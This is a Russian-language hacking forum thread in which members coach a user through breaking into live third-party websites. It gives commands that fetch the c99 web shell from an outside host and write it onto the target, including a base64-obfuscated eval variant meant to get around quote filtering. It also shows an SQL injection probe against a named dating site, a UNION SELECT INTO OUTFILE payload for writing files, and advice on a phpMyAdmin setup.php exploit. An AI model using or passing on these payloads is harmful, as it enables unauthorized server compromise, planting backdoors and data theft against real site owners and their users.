ты ищи возможности, а не недостатки - и тогда успех станет случаться намного чаще чем облом CTAPu4OK попробуй так команда 1. copy("http://madnet.name/files/download/9_c99madshell.php","/tmp/qwe.php"); команда 2. include("/tmp/qwe.php");
У меня то как раз все нормально!!! и команда copy("http://madnet.name/files/download/9_c99madshell.php","/tmp/qwe.php"); тибе ничего не даст, ибо шелл должен быть в .txt формате, а то он будет воспроизводится на том сервере и перенаправлен на этот!
что-то нехватает фантазии раскрутить: http://www.datehunters.com/Personals/member_page.asp?AdsID=17125+and+1=1&SexID=4
: )))) да я смотрю ты реальный знаток : )))) а еще я умею gif тоже исполнять и умею php делать текстом : )))) зайти по ссылке дабы больше не лохаться так
Тоже не как =( выполняется без ошибок, но файла на сервере нет. Через выполнение пхп и линукс команд я уже все что знал испробовал, переименовывал, перемещал, пытался записывать в уже имеющиеся файлы данные. У меня уже был такой случай, вот точно такой же, так же фильтровались кавычки, и из за них я нечего не мог сделать, сам не справился, попросил знакомого что бы помог, он с легкостью залил шелл через sql inj, а как не говорит =(
Скрипт не пашет Но это получится вот так eval($_GET[cmd]); exit; т.е. если бы он и заработал, я все равно бы нечего не смог сделать) после каждого выполнения скрипта exit; закрывает работу со скриптом, а без exit; експлойт не пашет =((( Я уже 2 дня над этим парюсь(
CTAPu4OK Надеюсь ты сам понимаешь что хочешь? Объясни по русски, что у тебя там имеется в наличии 1 Если есть исполнение кода и папки на запись, то почему ты не можешь залить шелл? 2 Если есть рутовый доступ в ПМА то о каких кавычках ты говоришь? phpinfo() покажи тут. А именно диррективы allow_url_fopen allow_url_include disable_functions magic_quotes_gpc open_basedir safe_mode И напиши что конкретно у тебя имеется. А то по твоим словам я не понимаю у тебя ПМА на том-же сервере, или на другом вообще.
https://forum.antichat.ru/showpost.php?p=2149589&postcount=13265 https://forum.antichat.ru/showpost.php?p=2152999&postcount=13287 Ты уж ответь на вопрос, будь так добр
все вы про "вопросы на низком уровне" что это такое? во интересно,все любят говорит,а когда задаешь вопрос никого нету
при ошибке "Microsoft VBScript runtime error '800a000d'" - фиг извлечёшь данные, это говоря об этом (типа "низкоуровневые запросы") а в данном случае извлечь возможно я адвокат только сам себе немного не так выразился в аксессе возможны инъекции
Вы его адвокат, молодой человек? Причём тут это? Или это означает по вашему, что в Accessе невозможна инъекция?
ПМА на сервере с сайтом (сервер 1) Эксплойт на другом сервере (сервер 2) TXT файл с командами для эксплойта (сервер 3) т.е. вот конф файл эксплойта PHP: $pma_setup_url = 'blablabla'; /*полный адрес скрипта установки phpMyAdmin (Сервер 1)*/ $ftp_code = 'blablabla'; /*полный ftp-путь до файла с содержимым <? phpinfo();exit; ?> (Сервер 3)*/ Что у меня есть: Эксплойт пма через Setup.php, возможность использовать стандартные команды на сервере ограниченного пользователя (просмотр всего содержимого, инфу сервера), использование коротких пхп скриптов. SQL Inj, Могу просматривать таблицы, колонки (минус в том что могу просматривать только с помощью limit или group_concat, пользователей очень много и найти среди них админа (Хоть и знаю логин) этими методами займут очень много времени (если ошибаюсь поправьте меня) и не факт что в админке будет аплоад), так же могу просматривать файлы с помощью LOAD_FILE Папки 777 Чего не могу: експлойт пма: Не могу выполнять команды "перемещения, записи, редактирования, удаления, переименовывания, инклюды, архивация, дампы и тд." SQL INJ: залить файл на сервер (из за ковычек), прочитать конфигурационные файлы "config.php" Не могу выйти за пределы папки www с помощью експлойта пма, а с помощью SQL INJ могу Не могу увидеть на экране ошибки которые выдает mysql, а где он хранит логи я не знаю =( 1. Исполнение есть, но ограниченное, не знаю как объяснить на научном но некоторые команды пашут а некоторые нет, и после каждой команды идет закрытие работы с сервером. 2. Рутового доступа в пма у меня нету, у меня есть доступ под юзверем apache который состоит в ограниченной группе apache. и рутовый доступ SQL INJ. allow_url_fopen On allow_url_include Нету такого disable_functions no value magic_quotes_gpc On open_basedir . safe_mode Off -587955+union+select+1,2,3,4,0x6869,6,7,8,9,10,11+into+outfile+'/home/data/www/'+from+mysql.user-- Вроде бы все написал и не где не ошибся)
Я так понимаю, ты утверждаешь, что там нет инъекции? Или в этих базах вообще невозможна инъекция? Или что ты хотел этим сказать? И при чём тут "низкий уровень"? Ты просто прочитал это там, и теперь не разобравшись о чём речь везде это пишешь, или у тебя есть свой взгляд на это, и ты способен своими словами, без линков описать мне, ЧТО ТЫ ХОТЕЛ ЭТИМ СКАЗАТЬ?
1. Да нет инъекции 2. -//-//-//-//- 3. -//-//-//-//- 4. ? 5. Да я просто прочитал это и везде пишу, у меня нету никаких взглядов на это. p.s. видимо я ошибался=( т.к. https://forum.antichat.net/showpost.php?p=474995&postcount=1
Не думаю что такое возможно. Не знаю что там у тебя за сплоит, но если он выполняет код, и есть папка на запись, то и шелл он зальёт. Просто ты что-то не так делаешь. Кавычки тут роль особую не играют, тебе уже сказали что нужно сделать: ev=eval(base64_decode(copy("http://madnet.name/files/download/9_c99madshell.php","/папка/на/запись.шелл.php")); Только разумеется вот это "http://madnet.name/files/download/9_c99madshell.php","/папка/на/запись.шелл.php"); кодируешь в бейс При твоих настройках должно работать без проблем. Хотя, я ХЗ что там у тебя за чудосплоит ======================== pinch ОК, ты пожалуйста будь повнимательнее, и прежде чем советовать что-то посмотри и проверь сам. Скуль там есть, разумеется, просто фильтрация union и select. Ну и уж конечно, в этих базах, как и во всех других без проблем проводятся скули, просто как и везде своя специфика
